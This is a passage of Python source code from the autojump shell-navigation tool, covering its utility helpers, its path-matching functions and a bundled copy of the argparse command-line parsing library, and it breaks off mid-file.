while True: tmp = it.next() except StopIteration: return tmp def move_file(src, dst): """ Atomically move file. Windows does not allow for atomic file renaming (which is used by os.rename / shutil.move) so destination paths must first be deleted. """ if is_windows() and os.path.exists(dst): # raises exception if file is in use on Windows os.remove(dst) shutil.move(src, dst) def print_entry(entry): print_local('%.1f:\t%s' % (entry.weight, entry.path)) def print_local(string): print(encode_local(string)) def print_tab_menu(needle, tab_entries, separator): """ Prints the tab completion menu according to the following format: [needle]__[index]__[possible_match] The needle (search pattern) and index are necessary to recreate the results on subsequent calls. """ for i, entry in enumerate(tab_entries): print_local( '%s%s%d%s%s' % ( needle, separator, i + 1, separator, entry.path, ), ) def sanitize(directories): # edge case to allow '/' as a valid path clean = lambda x: unico(x) if x == os.sep else unico(x).rstrip(os.sep) return list(imap(clean, directories)) def second(xs): it = iter(xs) try: if is_python2(): it.next() return it.next() elif is_python3(): next(it) return next(it) except StopIteration: return None def surround_quotes(string): """ Bash has problems dealing with certain paths so we're surrounding all path outputs with quotes. """ if in_bash() and string: # Python 2.6 requres field numbers return '"{0}"'.format(string) return string def take(n, iterable): """Return first n items of an iterable.""" return islice(iterable, n) def unico(string): """Converts into Unicode string.""" if is_python2() and not isinstance(string, unicode): return unicode(string, encoding='utf-8', errors='replace') return string File: bin/autojump_match.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re from difflib import SequenceMatcher from autojump_utils import is_python3 from autojump_utils import last if is_python3(): # pragma: no cover ifilter = filter imap = map os.getcwdu = os.getcwd else: from itertools import ifilter from itertools import imap def match_anywhere(needles, haystack, ignore_case=False): """ Matches needles anywhere in the path as long as they're in the same (but not necessary consecutive) order. For example: needles = ['foo', 'baz'] regex needle = r'.*foo.*baz.*' haystack = [ (path='/foo/bar/baz', weight=10), (path='/baz/foo/bar', weight=10), (path='/foo/baz', weight=10), ] result = [ (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] """ regex_needle = '.*' + '.*'.join(imap(re.escape, needles)) + '.*' regex_flags = re.IGNORECASE | re.UNICODE if ignore_case else re.UNICODE found = lambda haystack: re.search( regex_needle, haystack.path, flags=regex_flags, ) return ifilter(found, haystack) def match_consecutive(needles, haystack, ignore_case=False): """ Matches consecutive needles at the end of a path. 
For example: needles = ['foo', 'baz'] haystack = [ (path='/foo/bar/baz', weight=10), (path='/foo/baz/moo', weight=10), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] # We can't actually use re.compile because of re.UNICODE regex_needle = re.compile(r''' foo # needle #1 [^/]* # all characters except os.sep zero or more times / # os.sep [^/]* # all characters except os.sep zero or more times baz # needle #2 [^/]* # all characters except os.sep zero or more times $ # end of string ''') result = [ (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] """ regex_no_sep = '[^' + os.sep + ']*' regex_no_sep_end = regex_no_sep + '$' regex_one_sep = regex_no_sep + os.sep + regex_no_sep regex_needle = regex_one_sep.join(imap(re.escape, needles)) + regex_no_sep_end regex_flags = re.IGNORECASE | re.UNICODE if ignore_case else re.UNICODE found = lambda entry: re.search( regex_needle, entry.path, flags=regex_flags, ) return ifilter(found, haystack) def match_fuzzy(needles, haystack, ignore_case=False, threshold=0.6): """ Performs an approximate match with the last needle against the end of every path past an acceptable threshold. For example: needles = ['foo', 'bar'] haystack = [ (path='/foo/bar/baz', weight=11), (path='/foo/baz/moo', weight=10), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), (path='/foo/bar', weight=10), ] result = [ (path='/foo/bar/baz', weight=11), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), (path='/foo/bar', weight=10), ] This is a weak heuristic and used as a last resort to find matches. """ end_dir = lambda path: last(os.path.split(path)) if ignore_case: needle = last(needles).lower() match_percent = lambda entry: SequenceMatcher( a=needle, b=end_dir(entry.path.lower()), ).ratio() else: needle = last(needles) match_percent = lambda entry: SequenceMatcher( a=needle, b=end_dir(entry.path), ).ratio() meets_threshold = lambda entry: match_percent(entry) >= threshold return ifilter(meets_threshold, haystack) File: bin/autojump_argparse.py # -*- coding: utf-8 -*- # Author: Steven J. Bethard <[email protected]>. # flake8: noqa """Command-line parsing library This module is an optparse-inspired command-line parsing library that: - handles both optional and positional arguments - produces highly informative usage messages - supports parsers that dispatch to sub-parsers The following is a simple usage example that sums integers from the command-line and writes the result to a file:: parser = argparse.ArgumentParser( description='sum the integers at the command line') parser.add_argument( 'integers', metavar='int', nargs='+', type=int, help='an integer to be summed') parser.add_argument( '--log', default=sys.stdout, type=argparse.FileType('w'), help='the file where the sum should be written') args = parser.parse_args() args.log.write('%s' % sum(args.integers)) args.log.close() The module contains the following public classes: - ArgumentParser -- The main entry point for command-line parsing. As the example above shows, the add_argument() method is used to populate the parser with actions for optional and positional arguments. Then the parse_args() method is invoked to convert the args at the command-line into an object with attributes. - ArgumentError -- The exception raised by ArgumentParser objects when there are errors with the parser's actions. Errors raised while parsing the command-line are caught by ArgumentParser and emitted as command-line messages. - FileType -- A factory for defining types of files to be created. 
As the example above shows, instances of FileType are typically passed as the type= argument of add_argument() calls. - Action -- The base class for parser actions. Typically actions are selected by passing strings like 'store_true' or 'append_const' to the action= argument of add_argument(). However, for greater customization of ArgumentParser actions, subclasses of Action may be defined and passed as the action= argument. - HelpFormatter, RawDescriptionHelpFormatter, RawTextHelpFormatter, ArgumentDefaultsHelpFormatter -- Formatter classes which may be passed as the formatter_class= argument to the ArgumentParser constructor. HelpFormatter is the default, RawDescriptionHelpFormatter and RawTextHelpFormatter tell the parser not to change the formatting for help text, and ArgumentDefaultsHelpFormatter adds information about argument defaults to the help. All other classes in this module are considered implementation details. (Also note that HelpFormatter and RawDescriptionHelpFormatter are only considered public as object names -- the API of the formatter objects is still considered an implementation detail.) """ __version__ = '1.2.1' __all__ = [ 'ArgumentParser', 'ArgumentError', 'ArgumentTypeError', 'FileType', 'HelpFormatter', 'ArgumentDefaultsHelpFormatter', 'RawDescriptionHelpFormatter', 'RawTextHelpFormatter', 'Namespace', 'Action', 'ONE_OR_MORE', 'OPTIONAL', 'PARSER', 'REMAINDER', 'SUPPRESS', 'ZERO_OR_MORE', ] import copy as _copy import os as _os import re as _re import sys as _sys import textwrap as _textwrap from gettext import gettext as _ try: set except NameError: # for python < 2.4 compatibility (sets module is there since 2.3): from sets import Set as set try: basestring except NameError: basestring = str try: sorted except NameError: # for python < 2.4 compatibility: def sorted(iterable, reverse=False): result = sorted(iterable) if reverse: result.reverse() return result def _callable(obj): return hasattr(obj, '__call__') or hasattr(obj, '__bases__') SUPPRESS = '==SUPPRESS==' OPTIONAL = '?' ZERO_OR_MORE = '*' ONE_OR_MORE = '+' PARSER = 'A...' REMAINDER = '...' _UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args' # ============================= # Utility functions and classes # ============================= class _AttributeHolder(object): """Abstract base class that provides __repr__. The __repr__ method returns a string in the format:: ClassName(attr=name, attr=name, ...) The attributes are determined either by a class-level attribute, '_kwarg_names', or by inspecting the instance __dict__. """ def __repr__(self): type_name = type(self).__name__ arg_strings = [] for arg in self._get_args(): arg_strings.append(repr(arg)) for name, value in self._get_kwargs(): arg_strings.append('%s=%r' % (name, value)) return '%s(%s)' % (type_name, ', '.join(arg_strings)) def _get_kwargs(self): return sorted(self.__dict__.items()) def _get_args(self): return [] def _ensure_value(namespace, name, value): if getattr(namespace, name, None) is None: setattr(namespace, name, value) return getattr(namespace, name) # =============== # Formatting Help # =============== class HelpFormatter(object): """Formatter for generating usage messages and argument help strings. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. 
""" def __init__( self, prog, indent_increment=2, max_help_position=24, width=None, ): # default setting for width if width is None: try: width = int(_os.environ['COLUMNS']) except (KeyError, ValueError): width = 80 width -= 2 self._prog = prog self._indent_increment = indent_increment self._max_help_position = max_help_position self._width = width self._current_indent = 0 self._level = 0 self._action_max_length = 0 self._root_section = self._Section(self, None) self._current_section = self._root_section self._whitespace_matcher = _re.compile(r'\s+') self._long_break_matcher = _re.compile(r'\n\n\n+') # =============================== # Section and indentation methods # =============================== def _indent(self): self._current_indent += self._indent_increment self._level += 1 def _dedent(self): self._current_indent -= self._indent_increment assert self._current_indent >= 0, 'Indent decreased below 0.' self._level -= 1 class _Section(object): def __init__(self, formatter, parent, heading=None): self.formatter = formatter self.parent = parent self.heading = heading self.items = [] def format_help(self): # format the indented section if self.parent is not None: self.formatter._indent() join = self.formatter._join_parts for func, args in self.items: func(*args) item_help = join([func(*args) for func, args in self.items]) if self.parent is not None: self.formatter._dedent() # return nothing if the section was empty if not item_help: return '' # add the heading if the section was non-empty if self.heading is not SUPPRESS and self.heading is not None: current_indent = self.formatter._current_indent heading = '%*s%s:\n' % (current_indent, '', self.heading) else: heading = '' # join the section-initial newline, the heading and the help return join(['\n', heading, item_help, '\n']) def _add_item(self, func, args): self._current_section.items.append((func, args)) # ======================== # Message building methods # ======================== def start_section(self, heading): self._indent() section = self._Section(self, self._current_section, heading) self._add_item(section.format_help, []) self._current_section = section def end_section(self): self._current_section = self._current_section.parent self._dedent() def add_text(self, text): if text is not SUPPRESS and text is not None: self._add_item(self._format_text, [text]) def add_usage(self, usage, actions, groups, prefix=None): if usage is not SUPPRESS: args = usage, actions, groups, prefix self._add_item(self._format_usage, args) def add_argument(self, action): if action.help is not SUPPRESS: # find all invocations get_invocation = self._format_action_invocation invocations = [get_invocation(action)] for subaction in self._iter_indented_subactions(action): invocations.append(get_invocation(subaction)) # update the maximum item length invocation_length = max([len(s) for s in invocations]) action_length = invocation_length + self._current_indent self._action_max_length = max( self._action_max_length, action_length, ) # add the item to the list self._add_item(self._format_action, [action]) def add_arguments(self, actions): for action in actions: self.add_argument(action) # ======================= # Help-formatting methods # ======================= def format_help(self): help = self._root_section.format_help() if help: help = self._long_break_matcher.sub('\n\n', help) help = help.strip('\n') + '\n' return help def _join_parts(self, part_strings): return ''.join([ part for part in part_strings if part and part is not SUPPRESS ]) def 
_format_usage(self, usage, actions, groups, prefix): if prefix is None: prefix = _('usage: ') # if usage is specified, use that if usage is not None: usage = usage % dict(prog=self._prog) # if no optionals or positionals are available, usage is just prog elif usage is None and not actions: usage = '%(prog)s' % dict(prog=self._prog) # if optionals and positionals are available, calculate usage elif usage is None: prog = '%(prog)s' % dict(prog=self._prog) # split optionals from positionals optionals = [] positionals = [] for action in actions: if action.option_strings: optionals.append(action) else: positionals.append(action) # build full usage string format = self._format_actions_usage action_usage = format(optionals + positionals, groups) usage = ' '.join([s for s in [prog, action_usage] if s]) # wrap the usage parts if it's too long text_width = self._width - self._current_indent if len(prefix) + len(usage) > text_width: # break usage into wrappable parts part_regexp = r'\(.*?\)+|\[.*?\]+|\S+' opt_usage = format(optionals, groups) pos_usage = format(positionals, groups) opt_parts = _re.findall(part_regexp, opt_usage) pos_parts = _re.findall(part_regexp, pos_usage) assert ' '.join(opt_parts) == opt_usage assert ' '.join(pos_parts) == pos_usage # helper for wrapping lines def get_lines(parts, indent, prefix=None): lines = [] line = [] if prefix is not None: line_len = len(prefix) - 1 else: line_len = len(indent) - 1 for part in parts: if line_len + 1 + len(part) > text_width: lines.append(indent + ' '.join(line)) line = [] line_len = len(indent) - 1 line.append(part) line_len += len(part) + 1 if line: lines.append(indent + ' '.join(line)) if prefix is not None: lines[0] = lines[0][len(indent):] return lines # if prog is short, follow it with optionals or positionals if len(prefix) + len(prog) <= 0.75 * text_width: indent = ' ' * (len(prefix) + len(prog) + 1) if opt_parts: lines = get_lines([prog] + opt_parts, indent, prefix) lines.extend(get_lines(pos_parts, indent)) elif pos_parts: lines = get_lines([prog] + pos_parts, indent, prefix) else: lines = [prog] # if prog is long, put it on its own line else: indent = ' ' * len(prefix) parts = opt_parts + pos_parts lines = get_lines(parts, indent) if len(lines) > 1: lines = [] lines.extend(get_lines(opt_parts, indent)) lines.extend(get_lines(pos_parts, indent)) lines = [prog] + lines # join lines into usage usage = '\n'.join(lines) # prefix with 'usage:' return '%s%s\n\n' % (prefix, usage) def _format_actions_usage(self, actions, groups): # find group indices and identify actions in groups group_actions = set() inserts = {} for group in groups: try: start = actions.index(group._group_actions[0]) except ValueError: continue else: end = start + len(group._group_actions) if actions[start:end] == group._group_actions: for action in group._group_actions: group_actions.add(action) if not group.required: if start in inserts: inserts[start] += ' [' else: inserts[start] = '[' inserts[end] = ']' else: if start in inserts: inserts[start] += ' (' else: inserts[start] = '(' inserts[end] = ')' for i in range(start + 1, end): inserts[i] = '|' # collect all actions format strings parts = [] for i, action in enumerate(actions): # suppressed arguments are marked with None # remove | separators for suppressed arguments if action.help is SUPPRESS: parts.append(None) if inserts.get(i) == '|': inserts.pop(i) elif inserts.get(i + 1) == '|': inserts.pop(i + 1) # produce all arg strings elif not action.option_strings: part = self._format_args(action, action.dest) # if 
it's in a group, strip the outer [] if action in group_actions: if part[0] == '[' and part[-1] == ']': part = part[1:-1] # add the action string to the list parts.append(part) # produce the first way to invoke the option in brackets else: option_string = action.option_strings[0] # if the Optional doesn't take a value, format is: # -s or --long if action.nargs == 0: part = '%s' % option_string # if the Optional takes a value, format is: # -s ARGS or --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) part = '%s %s' % (option_string, args_string) # make it look optional if it's not required or in a group if not action.required and action not in group_actions: part = '[%s]' % part # add the action string to the list parts.append(part) # insert things at the necessary indices for i in sorted(inserts, reverse=True): parts[i:i] = [inserts[i]] # join all the action items with spaces text = ' '.join([item for item in parts if item is not None]) # clean up separators for mutually exclusive groups open = r'[\[(]' close = r'[\])]' text = _re.sub(r'(%s) ' % open, r'\1', text) text = _re.sub(r' (%s)' % close, r'\1', text) text = _re.sub(r'%s *%s' % (open, close), r'', text) text = _re.sub(r'\(([^|]*)\)', r'\1', text) text = text.strip() # return the text return text def _format_text(self, text): if '%(prog)' in text: text = text % dict(prog=self._prog) text_width = self._width - self._current_indent indent = ' ' * self._current_indent return self._fill_text(text, text_width, indent) + '\n\n' def _format_action(self, action): # determine the required width and the entry label help_position = min( self._action_max_length + 2, self._max_help_position, ) help_width = self._width - help_position action_width = help_position - self._current_indent - 2 action_header = self._format_action_invocation(action) # ho nelp; start on same line and add a final newline if not action.help: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup # short action name; start on the same line and pad two spaces elif len(action_header) <= action_width: tup = self._current_indent, '', action_width, action_header action_header = '%*s%-*s ' % tup indent_first = 0 # long action name; start on the next line else: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup indent_first = help_position # collect the pieces of the action help parts = [action_header] # if there was help for the action, add lines of help text if action.help: help_text = self._expand_help(action) help_lines = self._split_lines(help_text, help_width) parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) # or add a newline if the description doesn't end with one elif not action_header.endswith('\n'): parts.append('\n') # if there are any sub-actions, add their help as well for subaction in self._iter_indented_subactions(action): parts.append(self._format_action(subaction)) # return a single string return self._join_parts(parts) def _format_action_invocation(self, action): if not action.option_strings: metavar, = self._metavar_formatter(action, action.dest)(1) return metavar else: parts = [] # if the Optional doesn't take a value, format is: # -s, --long if action.nargs == 0: parts.extend(action.option_strings) # if the Optional takes a value, format is: # -s ARGS, --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) for option_string in 
action.option_strings: parts.append('%s %s' % (option_string, args_string)) return ', '.join(parts) def _metavar_formatter(self, action, default_metavar): if action.metavar is not None: result = action.metavar elif action.choices is not None: choice_strs = [str(choice) for choice in action.choices] result = '{%s}' % ','.join(choice_strs) else: result = default_metavar def format(tuple_size): if isinstance(result, tuple): return result else: return (result, ) * tuple_size return format def _format_args(self, action, default_metavar): get_metavar = self._metavar_formatter(action, default_metavar) if action.nargs is None: result = '%s' % get_metavar(1) elif action.nargs == OPTIONAL: result = '[%s]' % get_metavar(1) elif action.nargs == ZERO_OR_MORE: result = '[%s [%s ...]]' % get_metavar(2) elif action.nargs == ONE_OR_MORE: result = '%s [%s ...]' % get_metavar(2) elif action.nargs == REMAINDER: result = '...' elif action.nargs == PARSER: result = '%s ...' % get_metavar(1) else: formats = ['%s' for _ in range(action.nargs)] result = ' '.join(formats) % get_metavar(action.nargs) return result def _expand_help(self, action): params = dict(vars(action), prog=self._prog) for name in list(params): if params[name] is SUPPRESS: del params[name] for name in list(params): if hasattr(params[name], '__name__'): params[name] = params[name].__name__ if params.get('choices') is not None: choices_str = ', '.join([str(c) for c in params['choices']]) params['choices'] = choices_str return self._get_help_string(action) % params def _iter_indented_subactions(self, action): try: get_subactions = action._get_subactions except AttributeError: pass else: self._indent() for subaction in get_subactions(): yield subaction self._dedent() def _split_lines(self, text, width): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.wrap(text, width) def _fill_text(self, text, width, indent): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.fill( text, width, initial_indent=indent, subsequent_indent=indent, ) def _get_help_string(self, action): return action.help class RawDescriptionHelpFormatter(HelpFormatter): """Help message formatter which retains any formatting in descriptions. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _fill_text(self, text, width, indent): return ''.join([indent + line for line in text.splitlines(True)]) class RawTextHelpFormatter(RawDescriptionHelpFormatter): """Help message formatter which retains formatting of all help text. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _split_lines(self, text, width): return text.splitlines() class ArgumentDefaultsHelpFormatter(HelpFormatter): """Help message formatter which adds default values to argument help. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. 
""" def _get_help_string(self, action): help = action.help if '%(default)' not in action.help: if action.default is not SUPPRESS: defaulting_nargs = [OPTIONAL, ZERO_OR_MORE] if action.option_strings or action.nargs in defaulting_nargs: help += ' (default: %(default)s)' return help # ===================== # Options and Arguments # ===================== def _get_action_name(argument): if argument is None: return None elif argument.option_strings: return '/'.join(argument.option_strings) elif argument.metavar not in (None, SUPPRESS): return argument.metavar elif argument.dest not in (None, SUPPRESS): return argument.dest else: return None class ArgumentError(Exception): """An error from creating or using an argument (optional or positional). The string value of this exception is the message, augmented with information about the argument that caused it. """ def __init__(self, argument, message): self.argument_name = _get_action_name(argument) self.message = message def __str__(self): if self.argument_name is None: format = '%(message)s' else: format = 'argument %(argument_name)s: %(message)s' return format % dict( message=self.message, argument_name=self.argument_name, ) class ArgumentTypeError(Exception): """An error from trying to convert a command line string to a type.""" pass # ============== # Action classes # ============== class Action(_AttributeHolder): """Information about how to convert command line strings to Python objects. Action objects are used by an ArgumentParser to represent the information needed to parse a single argument from one or more strings from the command line. The keyword arguments to the Action constructor are also all attributes of Action instances. Keyword Arguments: - option_strings -- A list of command-line option strings which should be associated with this action. - dest -- The name of the attribute to hold the created object(s) - nargs -- The number of command-line arguments that should be consumed. By default, one argument will be consumed and a single value will be produced. Other values include: - N (an integer) consumes N arguments (and produces a list) - '?' consumes zero or one arguments - '*' consumes zero or more arguments (and produces a list) - '+' consumes one or more arguments (and produces a list) Note that the difference between the default and nargs=1 is that with the default, a single value will be produced, while with nargs=1, a list containing a single value will be produced. - const -- The value to be produced if the option is specified and the option uses an action that takes no values. - default -- The value to be produced if the option is not specified. - type -- The type which the command-line arguments should be converted to, should be one of 'string', 'int', 'float', 'complex' or a callable object that accepts a single string argument. If None, 'string' is assumed. - choices -- A container of values that should be allowed. If not None, after a command-line argument has been converted to the appropriate type, an exception will be raised if it is not a member of this collection. - required -- True if the action must always be specified at the command line. This is only meaningful for optional command-line arguments. - help -- The help string describing the argument. - metavar -- The name to be used for the option's argument with the help string. If None, the 'dest' value will be used as the name. 
""" def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): self.option_strings = option_strings self.dest = dest self.nargs = nargs self.const = const self.default = default self.type = type self.choices = choices self.required = required self.help = help self.metavar = metavar def _get_kwargs(self): names = [ 'option_strings', 'dest', 'nargs', 'const', 'default', 'type', 'choices', 'help', 'metavar', ] return [(name, getattr(self, name)) for name in names] def __call__(self, parser, namespace, values, option_string=None): raise NotImplementedError(_('.__call__() not defined')) class _StoreAction(Action): def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): if nargs == 0: raise ValueError( 'nargs for store actions must be > 0; if you ' 'have nothing to store, actions such as store ' 'true or store const may be more appropriate', ) if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_StoreAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, values) class _StoreConstAction(Action): def __init__( self, option_strings, dest, const, default=None, required=False, help=None, metavar=None, ): super(_StoreConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help, ) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, self.const) class _StoreTrueAction(_StoreConstAction): def __init__( self, option_strings, dest, default=False, required=False, help=None, ): super(_StoreTrueAction, self).__init__( option_strings=option_strings, dest=dest, const=True, default=default, required=required, help=help, ) class _StoreFalseAction(_StoreConstAction): def __init__( self, option_strings, dest, default=True, required=False, help=None, ): super(_StoreFalseAction, self).__init__( option_strings=option_strings, dest=dest, const=False, default=default, required=required, help=help, ) class _AppendAction(Action): def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): if nargs == 0: raise ValueError( 'nargs for append actions must be > 0; if arg ' 'strings are not supplying the value to append, ' 'the append const action may be more appropriate', ) if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_AppendAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(values) setattr(namespace, self.dest, items) class _AppendConstAction(Action): def __init__( self, option_strings, dest, const, default=None, required=False, help=None, metavar=None, ): super(_AppendConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help, 
metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(self.const) setattr(namespace, self.dest, items) class _CountAction(Action): def __init__( self, option_strings, dest, default=None, required=False, help=None, ): super(_CountAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, default=default, required=required, help=help, ) def __call__(self, parser, namespace, values, option_string=None): new_count = _ensure_value(namespace, self.dest, 0) + 1 setattr(namespace, self.dest, new_count) class _HelpAction(Action): def __init__( self, option_strings, dest=SUPPRESS, default=SUPPRESS, help=None, ): super(_HelpAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help, ) def __call__(self, parser, namespace, values, option_string=None): parser.print_help() parser.exit() class _VersionAction(Action): def __init__( self, option_strings, version=None, dest=SUPPRESS, default=SUPPRESS, help="show program's version number and exit", ): super(_VersionAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help, ) self.version = version def __call__(self, parser, namespace, values, option_string=None): version = self.version if version is None: version = parser.version formatter = parser._get_formatter() formatter.add_text(version) parser.exit(message=formatter.format_help()) class _SubParsersAction(Action): class _ChoicesPseudoAction(Action): def __init__(self, name, help): sup = super(_SubParsersAction._ChoicesPseudoAction, self) sup.__init__(option_strings=[], dest=name, help=help) def __init__( self, option_strings, prog, parser_class, dest=SUPPRESS, help=None, metavar=None, ): self._prog_prefix = prog self._parser_class = parser_class self._name_parser_map = {} self._choices_actions = [] super(_SubParsersAction, self).__init__( option_strings=option_strings, dest=dest, nargs=PARSER, choices=self._name_parser_map, help=help, metavar=metavar, ) def add_parser(self, name, **kwargs): # set prog from the existing prefix if kwargs.get('prog') is None: kwargs['prog'] = '%s %s' % (self._prog_prefix, name) # create a pseudo-action to hold the choice help if 'help' in kwargs: help = kwargs.pop('help') choice_action = self._ChoicesPseudoAction(name, help) self._choices_actions.append(choice_action) # create the parser and add it to the map parser = self._parser_class(**kwargs) self._name_parser_map[name] = parser return parser def _get_subactions(self): return self._choices_actions def __call__(self, parser, namespace, values, option_string=None): parser_name = values[0] arg_strings = values[1:] # set the parser name if requested if self.dest is not SUPPRESS: setattr(namespace, self.dest, parser_name) # select the parser try: parser = self._name_parser_map[parser_name] except KeyError: tup = parser_name, ', '.join(self._name_parser_map) msg = _('unknown parser %r (choices: %s)' % tup) raise ArgumentError(self, msg) # parse all the remaining options into the namespace # store any unrecognized options on the object, so that the top # level parser can decide what to do with them namespace, arg_strings = parser.parse_known_args( arg_strings, namespace, ) if arg_strings: vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, []) getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings) # ============== # Type classes # ============== class FileType(object): """Factory for creating file object types 
Instances of FileType are typically passed as type= arguments to the ArgumentParser add_argument() method. Keyword Arguments: - mode -- A string indicating how the file is to be opened. Accepts the same values as the builtin open() function. - bufsize -- The file's desired buffer size. Accepts the same values as the builtin open() function. """ def __init__(self, mode='r', bufsize=None): self._mode = mode self._bufsize = bufsize def __call__(self, string): # the special argument "-" means sys.std{in,out} if string == '-': if 'r' in self._mode: return _sys.stdin elif 'w' in self._mode: return _sys.stdout else: msg = _('argument "-" with mode %r' % self._mode) raise ValueError(msg) # all other arguments are used as file names if self._bufsize: return open(string, self._mode, self._bufsize) else: return open(string, self._mode) def __repr__(self): args = [self._mode, self._bufsize] args_str = ', '.join([repr(arg) for arg in args if arg is not None]) return '%s(%s)' % (type(self).__name__, args_str) # =========================== # Optional and Positional Parsing # =========================== class Namespace(_AttributeHolder): """Simple object for storing attributes. Implements equality by attribute names and values, and provides a simple string representation. """ def __init__(self, **kwargs): for name in kwargs: setattr(self, name, kwargs[name]) __hash__ = None def __eq__(self, other): return vars(self) == vars(other) def __ne__(self, other): return not (self == other) def __contains__(self, key): return key in self.__dict__ class _ActionsContainer(object): def __init__( self, description, prefix_chars, argument_default, conflict_handler, ): super(_ActionsContainer, self).__init__() self.description = description self.argument_default = argument_default self.prefix_chars = prefix_chars self.conflict_handler = conflict_handler # set up registries self._registries = {} # register actions self.register('action', None, _StoreAction) self.register('action', 'store', _StoreAction) self.register('action', 'store_const', _StoreConstAction) self.register('action', 'store_true', _StoreTrueAction) self.register('action', 'store_false', _StoreFalseAction) self.register('action', 'append', _AppendAction) self.register('action', 'append_const', _AppendConstAction) self.register('action', 'count', _CountAction) self.register('action', 'help', _HelpAction) self.register('action', 'version', _VersionAction) self.register('action', 'parsers', _SubParsersAction) # raise an exception if the conflict handler is invalid self._get_handler() # action storage self._actions = [] self._option_string_actions = {} # groups self._action_groups = [] self._mutually_exclusive_groups = [] # defaults storage self._defaults = {} # determines whether an "option" looks like a negative number self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$') # whether or not there are any optionals that look like negative # numbers -- uses a list so it can be shared and edited self._has_negative_number_optionals = [] # ==================== # Registration methods # ==================== def register(self, registry_name, value, object): registry = self._registries.setdefault(registry_name, {}) registry[value] = object def _registry_get(self, registry_name, value, default=None): return self._registries[registry_name].get(value, default) # ================================== # Namespace default accessor methods # ================================== def set_defaults(self, **kwargs): self._defaults.update(kwargs) # if these defaults match 
any existing arguments, replace # the previous default on the object with the new one for action in self._actions: if action.dest in kwargs: action.default = kwargs[action.dest] def get_default(self, dest): for action in self._actions: if action.dest == dest and action.default is not None: return action.default return self._defaults.get(dest, None) # ======================= # Adding argument actions # ======================= def add_argument(self, *args, **kwargs): """ add_argument(dest, ..., name=value, ...) add_argument(option_string, option_string, ..., name=value, ...) """ # if no positional args are supplied or only one is supplied and # it doesn't look like an option string, parse a positional # argument chars = self.prefix_chars if not args or len(args) == 1 and args[0][0] not in chars: if args and 'dest' in kwargs: raise ValueError('dest supplied twice for positional argument') kwargs = self._get_positional_kwargs(*args, **kwargs) # otherwise, we're adding an optional argument else: kwargs = self._get_optional_kwargs(*args, **kwargs) # if no default was supplied, use the parser-level default if 'default' not in kwargs: dest = kwargs['dest'] if dest in self._defaults: kwargs['default'] = self._defaults[dest] elif self.argument_default is not None: kwargs['default'] = self.argument_default # create the action object, and add it to the parser action_class = self._pop_action_class(kwargs) if not _callable(action_class): raise ValueError('unknown action "%s"' % action_class) action = action_class(**kwargs) # raise an error if the action type is not callable type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): raise ValueError('%r is not callable' % type_func) return self._add_action(action) def add_argument_group(self, *args, **kwargs): group = _ArgumentGroup(self, *args, **kwargs) self._action_groups.append(group) return group def add_mutually_exclusive_group(self, **kwargs): group = _MutuallyExclusiveGroup(self, **kwargs) self._mutually_exclusive_groups.append(group) return group def _add_action(self, action): # resolve any conflicts self._check_conflict(action) # add to actions list self._actions.append(action) action.container = self # index the action by any option strings it has for option_string in action.option_strings: self._option_string_actions[option_string] = action # set the flag if any option strings look like negative numbers for option_string in action.option_strings: if self._negative_number_matcher.match(option_string): if not self._has_negative_number_optionals: self._has_negative_number_optionals.append(True) # return the created action return action def _remove_action(self, action): self._actions.remove(action) def _add_container_actions(self, container): # collect groups by titles title_group_map = {} for group in self._action_groups: if group.title in title_group_map: msg = _('cannot merge actions - two groups are named %r') raise ValueError(msg % (group.title)) title_group_map[group.title] = group # map each action to its group group_map = {} for group in container._action_groups: # if a group with the title exists, use that, otherwise # create a new group matching the container's group if group.title not in title_group_map: title_group_map[group.title] = self.add_argument_group( title=group.title, description=group.description, conflict_handler=group.conflict_handler, ) # map the actions to their new group for action in group._group_actions: group_map[action] = title_group_map[group.title] # add container's mutually 
